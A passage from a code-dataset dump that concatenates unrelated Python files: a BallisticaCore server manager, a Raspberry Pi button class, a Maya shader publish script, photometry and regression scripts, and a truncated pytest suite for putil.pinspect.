time.sleep(0.1)\n\n def screenmessage(self,\n message: str,\n color: Optional[Tuple[float, float, float]] = None,\n clients: Optional[List[int]] = None) -> None:\n \"\"\"Display a screen-message.\n\n This will have no name attached and not show up in chat history.\n They will show up in replays, however (unless clients is passed).\n \"\"\"\n from bacommon.servermanager import ScreenMessageCommand\n self._enqueue_server_command(\n ScreenMessageCommand(message=message, color=color,\n clients=clients))\n\n def chatmessage(self,\n message: str,\n clients: Optional[List[int]] = None) -> None:\n \"\"\"Send a chat message from the server.\n\n This will have the server's name attached and will be logged\n in client chat windows, just like other chat messages.\n \"\"\"\n from bacommon.servermanager import ChatMessageCommand\n self._enqueue_server_command(\n ChatMessageCommand(message=message, clients=clients))\n\n def clientlist(self) -> None:\n \"\"\"Print a list of connected clients.\"\"\"\n from bacommon.servermanager import ClientListCommand\n self._enqueue_server_command(ClientListCommand())\n self._block_for_command_completion()\n\n def kick(self, client_id: int, ban_time: Optional[int] = None) -> None:\n \"\"\"Kick the client with the provided id.\n\n If ban_time is provided, the client will be banned for that\n length of time in seconds. If it is None, ban duration will\n be determined automatically. Pass 0 or a negative number for no\n ban time.\n \"\"\"\n from bacommon.servermanager import KickCommand\n self._enqueue_server_command(\n KickCommand(client_id=client_id, ban_time=ban_time))\n\n def restart(self, immediate: bool = True) -> None:\n \"\"\"Restart the server subprocess.\n\n This can be necessary for some config changes to take effect.\n By default, the server will exit immediately. If 'immediate' is passed\n as False, however, the server will instead exit at the next clean\n transition point (end of a series, etc).\n \"\"\"\n from bacommon.servermanager import ShutdownCommand, ShutdownReason\n self._enqueue_server_command(\n ShutdownCommand(reason=ShutdownReason.RESTARTING,\n immediate=immediate))\n\n # If we're asking for an immediate restart but don't get one within\n # the grace period, bring down the hammer.\n if immediate:\n self._subprocess_force_kill_time = (time.time() +\n IMMEDIATE_SHUTDOWN_TIME_LIMIT)\n\n def shutdown(self, immediate: bool = True) -> None:\n \"\"\"Shut down the server subprocess and exit the wrapper\n\n By default, the server will exit immediately. If 'immediate' is passed\n as False, however, the server will instead exit at the next clean\n transition point (end of a series, etc).\n \"\"\"\n from bacommon.servermanager import ShutdownCommand, ShutdownReason\n self._enqueue_server_command(\n ShutdownCommand(reason=ShutdownReason.NONE, immediate=immediate))\n\n # An explicit shutdown means we know to bail completely once this\n # subprocess completes.\n self._wrapper_shutdown_desired = True\n\n # If we're asking for an immediate shutdown but don't get one within\n # the grace period, bring down the hammer.\n if immediate:\n self._subprocess_force_kill_time = (time.time() +\n IMMEDIATE_SHUTDOWN_TIME_LIMIT)\n\n def _load_config(self) -> ServerConfig:\n user_config_path = 'config.yaml'\n\n if os.path.exists(user_config_path):\n import yaml\n with open(user_config_path) as infile:\n user_config_raw = yaml.safe_load(infile.read())\n\n # An empty config file will yield None, and that's ok.\n if user_config_raw is not None:\n return dataclass_from_dict(ServerConfig, user_config_raw)\n\n # Go with defaults if we weren't able to load anything.\n return ServerConfig()\n\n def _enable_tab_completion(self, locs: Dict) -> None:\n \"\"\"Enable tab-completion on platforms where available (linux/mac).\"\"\"\n try:\n import readline\n import rlcompleter\n readline.set_completer(rlcompleter.Completer(locs).complete)\n readline.parse_and_bind('tab:complete')\n except ImportError:\n # This is expected (readline doesn't exist under windows).\n pass\n\n def _bg_thread_main(self) -> None:\n \"\"\"Top level method run by our bg thread.\"\"\"\n while not self._done:\n self._run_server_cycle()\n\n def _handle_term_signal(self, sig: int, frame: FrameType) -> None:\n \"\"\"Handle signals (will always run in the main thread).\"\"\"\n del sig, frame # Unused.\n raise SystemExit()\n\n def _run_server_cycle(self) -> None:\n \"\"\"Spin up the server subprocess and run it until exit.\"\"\"\n\n self._prep_subprocess_environment()\n\n # Launch the binary and grab its stdin;\n # we'll use this to feed it commands.\n self._subprocess_launch_time = time.time()\n\n # Set an environment var so the server process knows its being\n # run under us. This causes it to ignore ctrl-c presses and other\n # slight behavior tweaks. Hmm; should this be an argument instead?\n os.environ['BA_SERVER_WRAPPER_MANAGED'] = '1'\n\n print(f'{Clr.CYN}Launching server subprocess...{Clr.RST}')\n binary_name = ('ballisticacore_headless.exe'\n if os.name == 'nt' else './ballisticacore_headless')\n self._subprocess = subprocess.Popen(\n [binary_name, '-cfgdir', 'ba_root'],\n stdin=subprocess.PIPE,\n cwd='dist')\n\n # Do the thing.\n # No matter how this ends up, make sure the process is dead after.\n try:\n self._run_subprocess_until_exit()\n finally:\n self._kill_subprocess()\n\n # If we want to die completely after this subprocess has ended,\n # tell the main thread to die.\n if self._wrapper_shutdown_desired:\n\n # Only do this if the main thread is not already waiting for\n # us to die; otherwise it can lead to deadlock.\n if not self._done:\n self._done = True\n\n # This should break the main thread out of its blocking\n # interpreter call.\n os.kill(os.getpid(), signal.SIGTERM)\n\n def _prep_subprocess_environment(self) -> None:\n \"\"\"Write files that must exist at process launch.\"\"\"\n os.makedirs('dist/ba_root', exist_ok=True)\n if os.path.exists('dist/ba_root/config.json'):\n with open('dist/ba_root/config.json') as infile:\n bincfg = json.loads(infile.read())\n else:\n bincfg = {}\n\n # Some of our config values translate directly into the\n # ballisticacore config file; the rest we pass at runtime.\n bincfg['Port'] = self._config.port\n bincfg['Auto Balance Teams'] = self._config.auto_balance_teams\n bincfg['Show Tutorial'] = False\n bincfg['Idle Exit Minutes'] = self._config.idle_exit_minutes\n with open('dist/ba_root/config.json', 'w') as outfile:\n outfile.write(json.dumps(bincfg))\n\n def _enqueue_server_command(self, command: ServerCommand) -> None:\n \"\"\"Enqueue a command to be sent to the server.\n\n Can be called from any thread.\n \"\"\"\n with self._subprocess_commands_lock:\n self._subprocess_commands.append(command)\n\n def _send_server_command(self, command: ServerCommand) -> None:\n \"\"\"Send a command to the server.\n\n Must be called from the server process thread.\n \"\"\"\n import pickle\n assert current_thread() is self._subprocess_thread\n assert self._subprocess is not None\n assert self._subprocess.stdin is not None\n val = repr(pickle.dumps(command))\n assert '\\n' not in val\n execcode = (f'import ba._servermode;'\n f' ba._servermode._cmd({val})\\n').encode()\n self._subprocess.stdin.write(execcode)\n self._subprocess.stdin.flush()\n\n def _run_subprocess_until_exit(self) -> None:\n assert current_thread() is self._subprocess_thread\n assert self._subprocess is not None\n assert self._subprocess.stdin is not None\n\n # Send the initial server config which should kick things off.\n # (but make sure its values are still valid first)\n dataclass_validate(self._config)\n self._send_server_command(StartServerModeCommand(self._config))\n\n while True:\n\n # If the app is trying to shut down, nope out immediately.\n if self._done:\n break\n\n # Pass along any commands to our process.\n with self._subprocess_commands_lock:\n for incmd in self._subprocess_commands:\n # If we're passing a raw string to exec, no need to wrap it\n # in any proper structure.\n if isinstance(incmd, str):\n self._subprocess.stdin.write((incmd + '\\n').encode())\n self._subprocess.stdin.flush()\n else:\n self._send_server_command(incmd)\n self._subprocess_commands = []\n\n # Request restarts/shut-downs for various reasons.\n self._request_shutdowns_or_restarts()\n\n # If they want to force-kill our subprocess, simply exit this\n # loop; the cleanup code will kill the process.\n if (self._subprocess_force_kill_time is not None\n and time.time() > self._subprocess_force_kill_time):\n print(f'{Clr.CYN}Force-killing subprocess...{Clr.RST}')\n break\n\n # Watch for the process exiting on its own..\n code: Optional[int] = self._subprocess.poll()\n if code is not None:\n if code == 0:\n clr = Clr.CYN\n slp = 0.0\n desc = ''\n elif code == 154:\n clr = Clr.CYN\n slp = 0.0\n desc = ' (idle_exit_minutes reached)'\n self._wrapper_shutdown_desired = True\n else:\n clr = Clr.SRED\n slp = 5.0 # Avoid super fast death loops.\n desc = ''\n print(f'{clr}Server subprocess exited'\n f' with code {code}{desc}.{Clr.RST}')\n self._reset_subprocess_vars()\n time.sleep(slp)\n break\n\n time.sleep(0.25)\n\n def _request_shutdowns_or_restarts(self) -> None:\n assert current_thread() is self._subprocess_thread\n assert self._subprocess_launch_time is not None\n sincelaunch = time.time() - self._subprocess_launch_time\n\n if (self._restart_minutes is not None and sincelaunch >\n (self._restart_minutes * 60.0)\n and not self._subprocess_sent_auto_restart):\n print(f'{Clr.CYN}restart_minutes ({self._restart_minutes})'\n f' elapsed; requesting subprocess'\n f' soft restart...{Clr.RST}')\n self.restart()\n self._subprocess_sent_auto_restart = True\n\n if self._config.clean_exit_minutes is not None:\n elapsed = (time.time() - self._launch_time) / 60.0\n if (elapsed > self._config.clean_exit_minutes\n and not self._subprocess_sent_clean_exit):\n print(f'{Clr.CYN}clean_exit_minutes'\n f' ({self._config.clean_exit_minutes})'\n f' elapsed; requesting subprocess'\n f' shutdown...{Clr.RST}')\n self.shutdown(immediate=False)\n self._subprocess_sent_clean_exit = True\n\n if self._config.unclean_exit_minutes is not None:\n elapsed = (time.time() - self._launch_time) / 60.0\n if (elapsed > self._config.unclean_exit_minutes\n and not self._subprocess_sent_unclean_exit):\n print(f'{Clr.CYN}unclean_exit_minutes'\n f' ({self._config.unclean_exit_minutes})'\n f' elapsed; requesting subprocess'\n f' shutdown...{Clr.RST}')\n self.shutdown(immediate=True)\n self._subprocess_sent_unclean_exit = True\n\n def _reset_subprocess_vars(self) -> None:\n self._subprocess = None\n self._subprocess_launch_time = None\n self._subprocess_sent_auto_restart = False\n self._subprocess_sent_clean_exit = False\n self._subprocess_sent_unclean_exit = False\n self._subprocess_force_kill_time = None\n\n def _kill_subprocess(self) -> None:\n \"\"\"End the server subprocess if it still exists.\"\"\"\n assert current_thread() is self._subprocess_thread\n if self._subprocess is None:\n return\n\n print(f'{Clr.CYN}Stopping subprocess...{Clr.RST}')\n\n # First, ask it nicely to die and give it a moment.\n # If that doesn't work, bring down the hammer.\n self._subprocess.terminate()\n try:\n self._subprocess.wait(timeout=10)\n except subprocess.TimeoutExpired:\n self._subprocess.kill()\n self._reset_subprocess_vars()\n print(f'{Clr.CYN}Subprocess stopped.{Clr.RST}')\n\n\ndef main() -> None:\n \"\"\"Run a BallisticaCore server manager in interactive mode.\"\"\"\n try:\n # ServerManager expects cwd to be the server dir (containing\n # dist/, config.yaml, etc.)\n # Let's change our working directory to the location of this file\n # so we can run this script from anywhere and it'll work.\n os.chdir(os.path.abspath(os.path.dirname(__file__)))\n\n ServerManagerApp().run_interactive()\n except CleanError as exc:\n # For clean errors, do a simple print and fail; no tracebacks/etc.\n exc.pretty_print()\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"assets/src/server/ballisticacore_server.py","file_name":"ballisticacore_server.py","file_ext":"py","file_size_in_byte":21740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633889046","text":"#!/usr/bin/env python3\n\nfrom RPi import GPIO\n\n\nclass Button:\n def __init__(self, button: str):\n \"\"\"\n Accepted values: 'left', 'right'.\n \"\"\"\n if button == \"left\":\n self.button = 17\n elif button == \"right\":\n self.button = 26\n else:\n raise ValueError(\"Invalid button name, allowed: 'left', 'right'.\")\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.button, GPIO.IN)\n\n def pressed(self) -> bool:\n \"\"\"\n Get button status (bool), check if is pressed.\n \"\"\"\n if not GPIO.input(self.button):\n return True\n else:\n return False\n","sub_path":"ZeroSeg/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"525293383","text":"# -*- coding: utf-8 -*-\nimport optparse\nimport logging\nimport maya.cmds as mc\nfrom miraLibs.pipeLibs import pipeFile\nfrom miraLibs.mayaLibs import open_file, quit_maya, export_selected, \\\n delete_history, delete_unused_nodes, delete_layer, \\\n get_selected_group_sg, get_shader_history_nodes, remove_namespace\nfrom miraLibs.pipeLibs.pipeMaya import rename_pipeline_shape, publish, get_model_name\n\n\ndef get_created_sg_node():\n exclude_sg = [\"initialParticleSE\", \"initialShadingGroup\"]\n sg_nodes = get_selected_group_sg.get_selected_group_sg()\n created_sg = list(set(sg_nodes)-set(exclude_sg))\n return created_sg\n\n\ndef get_prefix(context):\n asset_name = context.asset_name\n task = context.task\n prefix = asset_name+\"_\"+task+\"_\"\n return prefix\n\n\ndef rename_shd_mat_node(context):\n prefix = get_prefix(context)\n created_sg = get_created_sg_node()\n if not created_sg:\n return\n for sg in created_sg:\n material_nodes = get_shader_history_nodes.get_shader_history_nodes(sg)\n for node in material_nodes:\n if node.startswith(prefix):\n continue\n try:\n new_name = \"%s%s\" % (prefix, node)\n mc.rename(node, new_name)\n except:\n pass\n\n\ndef main():\n logger = logging.getLogger(\"shd publish\")\n file_path = options.file\n open_file.open_file(file_path)\n # get paths\n context = pipeFile.PathDetails.parse_path(file_path)\n publish_path = context.publish_path\n # import all reference\n publish.reference_opt()\n logger.info(\"Import all reference.\")\n # delete history and delete unused nodes\n delete_history.delete_history()\n delete_unused_nodes.delete_unused_nodes()\n # remove namespace\n remove_namespace.remove_namespace()\n logger.info(\"Remove namespace done.\")\n # rename mat node\n model_name = get_model_name.get_model_name()\n mc.select(model_name, r=1)\n rename_shd_mat_node(context)\n logger.info(\"Rename material name done.\")\n # rename shape\n if not rename_pipeline_shape.rename_pipeline_shape():\n raise RuntimeError(\"Rename shape error.\")\n logger.info(\"Rename shape done.\")\n # export _MODEL to publish path\n delete_layer.delete_layer()\n export_selected.export_selected(publish_path)\n logger.info(\"Save to %s\" % publish_path)\n # add to AD\n publish.add_mesh_to_ad(context)\n logger.info(\"Add to AD done.\")\n quit_maya.quit_maya()\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-f\", dest=\"file\", help=\"maya file ma or mb.\", metavar=\"string\")\n parser.add_option(\"-c\", dest=\"command\",\n help=\"Not a needed argument, just for mayabatch.exe, \" \\\n \"if missing this setting, optparse would \" \\\n \"encounter an error: \\\"no such option: -c\\\"\",\n metavar=\"string\")\n options, args = parser.parse_args()\n if len([i for i in [\"file_name\"] if i in dir()]) == 1:\n options.file = file_name\n main()\n","sub_path":"miraPipeline/maya/publish/shd_publish.py","file_name":"shd_publish.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557562019","text":"import os\nfrom glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport astropy.units as u\nfrom astropy.stats import mad_std\n\nfrom toolkit import (photometry, transit_model_b,\n PhotometryResults, PCA_light_curve, params_b)\n\n# Image paths\nimage_paths = sorted(glob('/Users/brettmorris/data/rem/20190829/IMG*UR*.fits'))\nmaster_flat_path = 'outputs/master_flat_s_201906_UR_g_1s_norm.fits'\nmaster_dark_path = 'outputs/masterdark.fits'\n\n# dark = np.zeros_like(fits.getdata(image_paths[0]))\n# fits.writeto(master_dark_path, dark)\n\n# Photometry settings\naperture_radii = np.arange(15, 30)\ncentroid_stamp_half_width = 10\npsf_stddev_init = 2\naperture_annulus_radius = 50\ntransit_parameters = params_b\nstar_positions = [[465, 359],\n [707, 528]]\noutput_path = 'outputs/20190831ur.npz'\nforce_recompute_photometry = False #True\n\n# Do photometry:\n\nif not os.path.exists(output_path) or force_recompute_photometry:\n print('Calculating photometry:')\n phot_results = photometry(image_paths, master_dark_path, master_flat_path,\n star_positions,\n aperture_radii, centroid_stamp_half_width,\n psf_stddev_init, aperture_annulus_radius,\n output_path)\n\nelse:\n phot_results = PhotometryResults.load(output_path)\n\nstds = []\nlcs = []\nfor ap in range(phot_results.fluxes.shape[2]):\n regressors = np.vstack([phot_results.fluxes[:, 1, ap],\n phot_results.xcentroids[:, 0] - phot_results.xcentroids[:, 0].mean(),\n phot_results.ycentroids[:, 0] - phot_results.ycentroids[:, 0].mean(),\n phot_results.airmass,\n phot_results.background_median]).T\n\n target_lc = phot_results.fluxes[:, 0, ap]\n\n y = np.linalg.lstsq(regressors, target_lc, rcond=None)[0]\n comp_lc = regressors @ y\n lc = target_lc/comp_lc\n stds.append(mad_std(lc))\n lcs.append(lc)\n\nbest_ap = np.argmin(stds)\nbest_lc = lcs[best_ap]\n\nnp.save('outputs/20190831_g.npy', best_lc)\n\nfig, ax = plt.subplots(4, 1, figsize=(10, 5))\nax[0].plot(phot_results.times, best_lc, '.')\nax[1].set_ylabel('X')\nax[1].plot(phot_results.times, phot_results.xcentroids[:, 0], '.')\nax[1].plot(phot_results.times, phot_results.xcentroids[:, 1], '.')\n\nax[2].set_ylabel('Y')\nax[2].plot(phot_results.times, phot_results.ycentroids[:, 0], '.')\nax[2].plot(phot_results.times, phot_results.ycentroids[:, 1], '.')\n\nax[3].set_ylabel('Flux')\nax[3].plot(phot_results.times, phot_results.fluxes[:, 0, best_ap], '.')\nax[3].plot(phot_results.times, phot_results.fluxes[:, 1, best_ap], '.')\nplt.show()\n\n","sub_path":"20190831_ur.py","file_name":"20190831_ur.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435320805","text":"import csv\nimport numpy as np\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\nhour = []\npollution = []\n\ndef get_data(filename):\n with open(filename, 'r') as csvfile:\n csvFileReader = csv.reader(csvfile)\n next(csvFileReader)\n for row in csvFileReader:\n hour.append(int(row[4]))\n pollution.append(int(row[5]))\n return\n\ndef predict_pollution(hour, pollution, x):\n model = linear_model.LinearRegression()\n hour = np.reshape(hour, (len(hour), 1))\n pollution = np.reshape(pollution, (len(pollution), 1))\n model.fit(hour, pollution)\n pollution_predict = model.predict(hour)\n\n plt.scatter(hour, pollution, color='black')\n plt.plot(hour, pollution_predict, color='yellow', linewidth=2)\n plt.show()\n result = model.predict(x)\n return result[0][0]\n\n\n\nget_data('PRSA_data_2010.1.1-2014.12.31.csv')\nprediction = predict_pollution(hour,pollution,12.5)\nprint(\"predicted PM2.5 at 12:30 is:%f\"%prediction)\n\n","sub_path":"Lab3/source/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400500132","text":"# variable\n\n# integer\na = 5\n\n# casting Integer to String\na1 = str(5)\nprint(a1)\n\n# string\nb = 'hello'\n\n# float\nc = 19.005\n\n# casting float to Integer\nc1 = int(c)\nprint(c1)\n\n# complex\nd = 5+6j\n\n# boolean\ne = True\n","sub_path":"variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"572311141","text":"# test_pinspect.py\n# Copyright (c) 2013-2016 Pablo Acosta-Serafini\n# See LICENSE for details\n# pylint: disable=C0103,C0111,E0611,F0401,R0201,R0903,R0913,R0915,W0104,W0212,W0232,W0612,W0613,W0621\n\n# Standard library imports\nfrom __future__ import print_function\nfrom functools import partial\nimport copy\nimport os\nimport sys\nimport time\nimport types\n# PyPI imports\nimport pytest\nif sys.hexversion == 0x03000000:\n from putil.compat3 import _readlines\n# Putil imports\nimport putil.pinspect\nfrom putil.test import AE, AI, CS, GET_EXMSG, RE\n\n\n###\n# Helper functions\n###\nmodfile = lambda x: sys.modules[x].__file__\n\n\n###\n# Tests for module functions\n###\ndef test_private_props():\n \"\"\" Test private_props function behavior \"\"\"\n obj = putil.pinspect.Callables()\n assert sorted(list(putil.pinspect.private_props(obj))) == [\n '_callables_db',\n '_class_names',\n '_fnames',\n '_module_names',\n '_modules_dict',\n '_reverse_callables_db'\n ]\n\n\nif sys.hexversion == 0x03000000:\n def test_readlines():\n \"\"\" Test _readlines function behavior \"\"\"\n def mopen1(fname, mode):\n raise RuntimeError('Mock mopen1 function')\n def mopen2(fname, mode):\n text = chr(40960) + 'abcd' + chr(1972)\n # Next line raises UnicodeDecodeError\n b'\\x80abc'.decode(\"utf-8\", \"strict\")\n class MockOpenCls(object):\n def __init__(self, fname, mode, encoding):\n pass\n def __enter__(self):\n return self\n def __exit__(self, exc_type, exc_value, exc_tb):\n if exc_type is not None:\n return False\n def readlines(self):\n return 'MockOpenCls'\n pkg_dir = os.path.abspath(os.path.dirname(__file__))\n fname = os.path.join(pkg_dir, 'test_misc.py')\n # This should not trigger an exception (functionality checked\n # by other unit tests)\n _readlines(fname)\n # Trigger unrelated exception exception\n obj = _readlines\n with pytest.raises(RuntimeError) as excinfo:\n _readlines(fname, mopen1)\n assert GET_EXMSG(excinfo) == 'Mock mopen1 function'\n # Trigger UnicodeDecodeError exception\n assert _readlines(fname, mopen2, MockOpenCls) == 'MockOpenCls'\n\n\ndef test_object_is_module():\n \"\"\" Test object_is_module() function \"\"\"\n assert not putil.pinspect.is_object_module(5)\n assert putil.pinspect.is_object_module(sys.modules['putil.pinspect'])\n\n\ndef test_get_module_name():\n \"\"\" Test get_module_name() function \"\"\"\n obj = putil.pinspect.get_module_name\n AI(obj, 'module_obj', module_obj=5)\n mock_module_obj = types.ModuleType('mock_module_obj', 'Mock module')\n exmsg = (\n 'Module object `mock_module_obj` could not be found in loaded modules'\n )\n AE(obj, RE, exmsg, module_obj=mock_module_obj)\n ref = 'putil.pinspect'\n assert putil.pinspect.get_module_name(sys.modules[ref]) == ref\n assert putil.pinspect.get_module_name(sys.modules['putil']) == 'putil'\n\n\ndef test_get_module_name_from_fname():\n \"\"\" Test _get_module_name_from_fname() function \"\"\"\n obj = putil.pinspect._get_module_name_from_fname\n AE(obj, RE, 'Module could not be found', fname='_not_a_module')\n assert obj(modfile('putil.pinspect')) == 'putil.pinspect'\n\n\ndef test_is_special_method():\n \"\"\" Test is_special_method() function \"\"\"\n assert not putil.pinspect.is_special_method('func_name')\n assert not putil.pinspect.is_special_method('_func_name_')\n assert putil.pinspect.is_special_method('__func_name__')\n\n\n###\n# Test for classes\n###\nclass TestCallables(object):\n \"\"\" Test for Callables \"\"\"\n def test_check_intersection(self):\n \"\"\" Test _check_intersection method behavior \"\"\"\n obj1 = putil.pinspect.Callables()\n obj1._callables_db = {'call1':1, 'call2':2}\n obj2 = putil.pinspect.Callables()\n obj2._callables_db = {'call1':1, 'call2':'a'}\n exmsg = 'Conflicting information between objects'\n obj = obj1._check_intersection\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':['a', 'c']}\n obj2._callables_db = {'call1':1, 'call2':['a', 'b']}\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':{'a':'b'}}\n obj2._callables_db = {'call1':1, 'call2':{'a':'c'}}\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':'a'}\n obj2._callables_db = {'call1':1, 'call2':'c'}\n AE(obj, RE, exmsg, other=obj2)\n obj1._callables_db = {'call1':1, 'call2':'a'}\n obj2._callables_db = {'call1':1, 'call2':'a'}\n assert obj1._check_intersection(obj2) is None\n\n def test_init_exceptions(self):\n \"\"\" Test constructor exceptions \"\"\"\n obj = putil.pinspect.Callables\n for item in [5, [5]]:\n AI(obj, 'fnames', fnames=item)\n exmsg = 'File _not_a_file_ could not be found'\n AE(obj, OSError, exmsg, fnames=['_not_a_file_'])\n\n def test_add(self):\n \"\"\" Test __add__ __radd__ method behavior \"\"\"\n obj1 = putil.pinspect.Callables()\n obj1._callables_db = {'call1':{'a':5, 'b':6}, 'call2':{'a':7, 'b':8}}\n obj1._reverse_callables_db = {'rc1':'5', 'rc2':'7'}\n obj1._modules_dict = {\n 'key1':{'entry':'alpha'}, 'key2':{'entry':'beta'}\n }\n obj1._fnames = {'hello':0}\n obj1._module_names = ['this', 'is']\n obj1._class_names = ['once', 'upon']\n #\n obj2 = putil.pinspect.Callables()\n obj2._callables_db = {\n 'call3':{'a':10, 'b':100}, 'call4':{'a':200, 'b':300}\n }\n obj2._reverse_callables_db = {'rc3':'0', 'rc4':'1'}\n obj2._modules_dict = {'key3':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n obj2._fnames = {'world':1}\n obj2._module_names = ['a', 'test']\n obj2._class_names = ['a', 'time']\n #\n obj1._callables_db = {'call3':{'a':5, 'b':6}, 'call2':{'a':7, 'b':8}}\n with pytest.raises(RuntimeError) as excinfo:\n obj1+obj2\n assert GET_EXMSG(excinfo) == 'Conflicting information between objects'\n obj1._callables_db = {'call1':{'a':5, 'b':6}, 'call2':{'a':7, 'b':8}}\n #\n obj2._reverse_callables_db = {'rc3':'5', 'rc2':'-1'}\n with pytest.raises(RuntimeError) as excinfo:\n obj1+obj2\n assert GET_EXMSG(excinfo) == 'Conflicting information between objects'\n obj2._reverse_callables_db = {'rc3':'0', 'rc4':'-1'}\n #\n obj2._modules_dict = {'key1':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n with pytest.raises(RuntimeError) as excinfo:\n obj1+obj2\n assert GET_EXMSG(excinfo) == 'Conflicting information between objects'\n obj2._modules_dict = {'key3':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n # Test when intersection is the same\n obj2._modules_dict = {\n 'key1':{'entry':'alpha'}, 'key4':{'entry':'gamma'}\n }\n obj1+obj2\n obj2._modules_dict = {'key3':{'entry':'pi'}, 'key4':{'entry':'gamma'}}\n #\n sobj = obj1+obj2\n scomp = lambda x, y: sorted(x) == sorted(y)\n ref = {\n 'call1':{'a':5, 'b':6},\n 'call2':{'a':7, 'b':8},\n 'call3':{'a':10, 'b':100},\n 'call4':{'a':200, 'b':300}\n }\n assert scomp(sobj._callables_db, ref)\n ref = {'rc1':'5', 'rc2':'7', 'rc3':'0', 'rc4':'-1'}\n assert scomp(sobj._reverse_callables_db, ref)\n ref = {\n 'key1':{'entry':'alpha'},\n 'key2':{'entry':'beta'},\n 'key3':{'entry':'pi'},\n 'key4':{'entry':'gamma'}\n }\n assert scomp(sobj._modules_dict, ref)\n assert scomp(sobj._fnames, {'hello':0, 'world':1})\n assert scomp(sobj._module_names, ['this', 'is', 'a', 'test'])\n assert scomp(sobj._class_names, ['once', 'upon', 'a', 'time'])\n #\n obj1 += obj2\n ref = {\n 'call1':{'a':5, 'b':6},\n 'call2':{'a':7, 'b':8},\n 'call3':{'a':10, 'b':100},\n 'call4':{'a':200, 'b':300}\n }\n assert scomp(obj1._callables_db, ref)\n ref = {'rc1':'5', 'rc2':'7', 'rc3':'0', 'rc4':'-1'}\n assert scomp(obj1._reverse_callables_db, ref)\n ref = {\n 'key1':{'entry':'alpha'},\n 'key2':{'entry':'beta'},\n 'key3':{'entry':'pi'},\n 'key4':{'entry':'gamma'}\n }\n assert scomp(obj1._modules_dict, ref)\n assert scomp(obj1._fnames, {'hello':0, 'world':1})\n assert scomp(obj1._module_names, ['this', 'is', 'a', 'test'])\n assert scomp(obj1._class_names, ['once', 'upon', 'a', 'time'])\n\n def test_copy(self):\n \"\"\" Test __copy__ method behavior \"\"\"\n sobj = putil.pinspect.Callables()\n import tests.support.pinspect_support_module_1\n sobj.trace([modfile('tests.support.pinspect_support_module_1')])\n dobj = copy.copy(sobj)\n assert sobj._module_names == dobj._module_names\n assert id(sobj._module_names) != id(dobj._module_names)\n assert sobj._class_names == dobj._class_names\n assert id(sobj._class_names) != id(dobj._class_names)\n assert sobj._callables_db == dobj._callables_db\n assert id(sobj._callables_db) != id(dobj._callables_db)\n assert sobj._reverse_callables_db == dobj._reverse_callables_db\n assert id(sobj._reverse_callables_db) != id(dobj._reverse_callables_db)\n\n def test_eq(self):\n \"\"\" Test __eq__ method behavior \"\"\"\n obj1 = putil.pinspect.Callables()\n obj2 = putil.pinspect.Callables()\n obj3 = putil.pinspect.Callables()\n import tests.support.pinspect_support_module_1\n import tests.support.pinspect_support_module_2\n mname = 'tests.support.pinspect_support_module_1'\n obj1.trace([modfile(mname)])\n obj2.trace([modfile(mname)])\n obj3.trace([modfile('putil.test')])\n assert (obj1 == obj2) and (obj1 != obj3)\n assert obj1 != 5\n\n def test_repr(self):\n \"\"\" Test __repr__ method behavior \"\"\"\n get_name = lambda x: modfile(x).replace('.pyc', '.py')\n import tests.support.exdoc_support_module_1\n file1 = get_name('tests.support.exdoc_support_module_1')\n file2 = get_name('tests.support.exdoc_support_module_2')\n xobj = putil.pinspect.Callables([file2])\n xobj.trace([file1])\n ref = \"putil.pinspect.Callables([{0}, {1}])\".format(\n repr(file1), repr(file2)\n )\n assert repr(xobj) == ref\n\n def test_str_empty(self):\n \"\"\" Test __str__ magic method when object is empty \"\"\"\n obj = putil.pinspect.Callables()\n assert str(obj) == ''\n\n def test_refresh(self):\n \"\"\" Test refresh method behavior \"\"\"\n ref = modfile('putil.test')\n src = os.path.join(os.path.dirname(ref), 'pit.py')\n with open(src, 'w') as fobj:\n fobj.write(\n 'class MyClass(object):\\n'\n ' pass\\n'\n 'def func1():\\n'\n ' pass\\n'\n )\n import putil.pit\n obj = putil.pinspect.Callables([ref, src])\n tmod = obj._fnames[src]\n obj.trace([src])\n assert obj._fnames[src] == tmod\n rtext = (\n 'Modules:\\n'\n ' putil.pit\\n'\n ' putil.test\\n'\n 'Classes:\\n'\n ' putil.pit.MyClass\\n'\n 'putil.pit.MyClass: class (1-2)\\n'\n 'putil.pit.func1: func (3-4)\\n'\n 'putil.test._get_fargs: func (32-67)\\n'\n 'putil.test._pcolor: func (68-82)\\n'\n 'putil.test.assert_arg_invalid: func (83-115)\\n'\n 'putil.test.assert_exception: func (116-199)\\n'\n 'putil.test._invalid_frame: func (200-206)\\n'\n 'putil.test.assert_prop: func (207-246)\\n'\n 'putil.test.assert_ro_prop: func (247-266)\\n'\n 'putil.test.compare_strings: func (267-356)\\n'\n 'putil.test.compare_strings.colorize_lines: func (296-307)\\n'\n 'putil.test.compare_strings.print_non_diff: func (308-312)\\n'\n 'putil.test.compare_strings.print_diff: func (313-321)\\n'\n 'putil.test.comp_list_of_dicts: func (357-371)\\n'\n 'putil.test.exception_type_str: func (372-389)\\n'\n 'putil.test.get_exmsg: func (390-404)'\n )\n 